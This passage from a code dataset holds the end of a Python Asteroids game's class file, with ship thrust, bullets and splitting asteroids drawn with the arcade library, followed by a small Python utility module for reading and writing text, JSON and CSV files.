math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n # lower right quarter-sphere\n if self.angle >= 180 and self.angle <= 270:\n thrust_angle = 270 - self.angle\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy -= math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n # upper right quarter-sphere\n if self.angle > 270 and self.angle < 360:\n thrust_angle = self.angle - 270\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy += 
math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n def rear_thrust(self):\n \"\"\"\n the method is mirroring the \"thrust\" velocity calculations to the opposite \n for slowing down or moving backward (uses the lower \"SHIP_SLOW_DOWN\" coefficient)\n :return: \n \"\"\"\n # upper left quarter-sphere\n if self.angle >= 0 and self.angle <= 90:\n thrust_angle = 90 - self.angle\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy -= math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\n # lower left quarter-sphere\n if self.angle > 90 and self.angle < 180:\n thrust_angle = self.angle - 90\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy += math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\n # lower right quarter-sphere\n if self.angle >= 180 and self.angle <= 270:\n thrust_angle = 270 - self.angle\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy += math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\n # upper right quarter-sphere\n if self.angle > 270 and self.angle < 360:\n thrust_angle = self.angle - 270\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy -= math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\nclass Bullet(FlyingObject):\n \"\"\"\n Properties and methods of bullets \n \"\"\"\n def __init__(self):\n super().__init__()\n self.radius = BULLET_RADIUS\n self.lives = BULLET_LIFE\n\n def fire(self, ship):\n \"\"\"\n 1) assign the values of the point and the velocity of the ship to the fired bullet \n 2) recalculate the velocity for the fired bullet\n (add 10 pixels per frame in the direction the ship is pointed to the assigned ship velocity)\n :param ship: \n :return: \n \"\"\"\n self.center.x = ship.center.x\n self.center.y = ship.center.y\n self.velocity.dx = ship.velocity.dx\n self.velocity.dy = ship.velocity.dy\n self.angle = ship.angle + 90\n\n self.velocity.dx += math.cos(math.radians(self.angle)) * BULLET_SPEED\n self.velocity.dy += math.sin(math.radians(self.angle)) * BULLET_SPEED\n\n def draw(self):\n \"\"\"\n 1) all FOs are drawn the same way\n except of the path on the first line\n 2) decrease one live on every draw\n :return: \n \"\"\"\n img = \"images/laserBlue01.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n self.lives -= 1\n\n\"\"\"\nThe cluster of asteroid classes\n\"\"\"\nclass Asteroid(FlyingObject):\n \"\"\"\n This is the parent for different asteroids\n \"\"\"\n def __init__(self):\n \"\"\"\n Get everything from the parent class,\n ,pick random rotation angle, \n and initiate the list of fractions for breaking the asteroid apart\n \"\"\"\n super().__init__()\n random_choice = random.randint(0, 1)\n if random_choice == 0:\n self.spin = 1\n else:\n self.spin = -1\n self.fractions = list()\n\n def advance(self):\n \"\"\"\n call the parent advance and adjust the angle if needed\n :return: \n \"\"\"\n super().advance()\n if self.angle > 360:\n self.angle = 0\n if self.angle < 0:\n self.angle = 360\n\n @abstractmethod\n def break_apart(self):\n \"\"\"\n this method is implemented differently for different asteroids\n :param self: \n :return: \n \"\"\"\n 
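# (Added note) Concrete subclasses build their replacement rocks here and\n        # append them to self.fractions; the game loop is expected to collect\n        # those fragments after a hit.\n        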
pass\n\n\"\"\"\nThe next three classes inherit from Asteroid\nand make specific adjustments for different kinds of asteroids\n\"\"\"\nclass BigAsteroid(Asteroid):\n \"\"\"\n 1\n \"\"\"\n def __init__(self, point, velocity):\n super().__init__()\n self.center = point\n self.velocity = velocity\n self.radius = BIG_ROCK_RADIUS\n\n def draw(self):\n \"\"\"\n all asteroids are drawn the same way\n except of the path on the first line\n :return: \n \"\"\"\n img = \"images/meteorGrey_big1.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n def advance(self):\n \"\"\"\n call the parent advance and add\n changing the rotation angle for this kind of asteroid accordingly to the game specifications\n :return: \n \"\"\"\n super().advance()\n self.angle += (BIG_ROCK_SPIN * self.spin)\n\n def break_apart(self):\n \"\"\"\n # 1 make two medium and one small asteroids,\n # 2 put them into the list of fractions for using int the \"explode()\" in \"asteroids.py\" \n :return: \n \"\"\"\n # 1\n # make the first medium asteroid\n point1 = Point()\n point1.x = self.center.x\n point1.y = self.center.y\n velocity1 = Velocity()\n velocity1.dx = self.velocity.dx\n velocity1.dy = self.velocity.dy + 2\n fraction1 = MediumAsteroid(point1, velocity1)\n # make the second medium asteroid\n point2 = Point()\n point2.x = self.center.x\n point2.y = self.center.y\n velocity2 = Velocity()\n velocity2.dx = self.velocity.dx\n velocity2.dy = self.velocity.dy - 2\n fraction2 = MediumAsteroid(point2, velocity2)\n # make the small asteroid\n point3 = Point()\n point3.x = self.center.x\n point3.y = self.center.y\n velocity3 = Velocity()\n velocity3.dx = self.velocity.dx + 5\n velocity3.dy = self.velocity.dy\n fraction3 = SmallAsteroid(point3, velocity3)\n\n # 2\n self.fractions.append(fraction1)\n self.fractions.append(fraction2)\n self.fractions.append(fraction3)\n\nclass MediumAsteroid(Asteroid):\n \"\"\"\n 2\n \"\"\"\n def __init__(self, point, velocity):\n super().__init__()\n self.center = point\n self.velocity = velocity\n self.radius = MEDIUM_ROCK_RADIUS\n\n def draw(self):\n \"\"\"\n all asteroids are drawn the same way\n except of the path on the first line\n :return: \n \"\"\"\n img = \"images/meteorGrey_med1.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n def advance(self):\n \"\"\"\n call the parent advance and add\n changing the rotation angle for this kind of asteroid accordingly to the game specifications\n :return: \n \"\"\"\n super().advance()\n self.angle += (MEDIUM_ROCK_SPIN * self.spin)\n\n def break_apart(self):\n \"\"\"\n # 1 make two small asteroids,\n # 2 put them into the list of fractions for using int the \"explode()\" in \"asteroids.py\" \n :return: \n \"\"\"\n # 1\n # make the first small asteroid\n point1 = Point()\n point1.x = self.center.x\n point1.y = self.center.y\n velocity1 = Velocity()\n velocity1.dx = self.velocity.dx + 1.5\n velocity1.dy = self.velocity.dy + 1.5\n fraction1 = SmallAsteroid(point1, velocity1)\n # make the second medium asteroid\n point2 = Point()\n point2.x = self.center.x\n point2.y = 
self.center.y\n velocity2 = Velocity()\n velocity2.dx = self.velocity.dx - 1.5\n velocity2.dy = self.velocity.dy - 1.5\n fraction2 = SmallAsteroid(point2, velocity2)\n\n # 2\n self.fractions.append(fraction1)\n self.fractions.append(fraction2)\n\nclass SmallAsteroid(Asteroid):\n \"\"\"\n 3\n \"\"\"\n def __init__(self, point, velocity):\n super().__init__()\n self.center = point\n self.velocity = velocity\n self.radius = SMALL_ROCK_RADIUS\n\n def draw(self):\n \"\"\"\n all asteroids are drawn the same way\n except of the path on the first line\n :return: \n \"\"\"\n img = \"images/meteorGrey_small1.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n def advance(self):\n \"\"\"\n call the parent advance and add\n changing the rotation angle for this kind of asteroid accordingly to the game specifications\n :return: \n \"\"\"\n super().advance()\n self.angle += (SMALL_ROCK_SPIN * self.spin)\n\n def break_apart(self):\n \"\"\"\n the small asteroid does not split apart\n :return: \n \"\"\"\n pass\n","repo_name":"YuraVasiuk/Python-Projects","sub_path":"Assignments/project/Asteroids/asteroids_classes.py","file_name":"asteroids_classes.py","file_ext":"py","file_size_in_byte":14999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74734607414","text":"import json\r\nimport pandas as pd\r\nfrom labs.config.logger_config import logger\r\n\r\npd.set_option('display.max_rows', None)\r\npd.set_option('display.max_columns', None)\r\n\r\nclass FileProcessor:\r\n \"\"\"\r\n FileProcessor is a class that interacts with files for reading and writing.\r\n \"\"\"\r\n\r\n @staticmethod\r\n def write_into_file(file_path: str, text: str) -> None:\r\n \"\"\"\r\n Write text into a file. May raise PermissionError or OSError.\r\n \"\"\"\r\n with open(file_path, \"w\", encoding=\"utf-8\") as file:\r\n logger.info(\"Writing into file %s\", file_path)\r\n file.write(text)\r\n\r\n @staticmethod\r\n def read_from_file(file_path: str) -> str:\r\n \"\"\"\r\n Read text from a file. May raise FileNotFoundError, PermissionError, or OSError.\r\n \"\"\"\r\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\r\n logger.info(\"Reading from file %s\", file_path)\r\n return file.read()\r\n\r\n @staticmethod\r\n def read_from_json(file_path: str) -> dict:\r\n \"\"\"\r\n Read a JSON file. May raise FileNotFoundError, PermissionError, OSError, or JSONDecodeError.\r\n \"\"\"\r\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\r\n logger.info(\"Reading from file %s\", file_path)\r\n return json.load(file)\r\n\r\n @staticmethod\r\n def write_into_json(file_path: str, jsons: list) -> None:\r\n \"\"\"\r\n Write a JSON text into a file. May raise FileNotFoundError, PermissionError, OSError, or JSONDecodeError.\r\n \"\"\"\r\n if not isinstance(file_path, str):\r\n logger.critical(\"Wrong data type: %s. It has to be string!\", type(file_path))\r\n raise TypeError(\"Type of file_path must be string\")\r\n if not isinstance(jsons, list):\r\n logger.critical(\"Wrong data type: %s. 
It has to be list!\", type(jsons))\r\n raise TypeError(\"Type of jsons must be list\")\r\n\r\n jsons_text_representation = json.dumps(jsons, indent=4)\r\n json.loads(jsons_text_representation)\r\n\r\n with open(file_path, \"w\", encoding=\"utf-8\") as file:\r\n logger.info(\"Writing into file %s\", file_path)\r\n file.write(jsons_text_representation)\r\n\r\n\r\nclass CsvProcessor:\r\n \"\"\"\r\n CsvProcessor is used to interact with csv-files.\r\n \"\"\"\r\n\r\n @staticmethod\r\n def read(file_path: str) -> pd.DataFrame:\r\n \"\"\"\r\n Read a CSV file into a pandas DataFrame. May raise FileNotFoundError, PermissionError, or OSError.\r\n \"\"\"\r\n if not isinstance(file_path, str):\r\n logger.critical(\"Wrong data type: %s. It has to be string!\", type(file_path))\r\n raise TypeError(\"Type of file_path must be string\")\r\n return pd.read_csv(file_path)\r\n","repo_name":"BOHDAN1329/SMP","sub_path":"SMP(labs)/labs/lab9/shared/file_processor.py","file_name":"file_processor.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}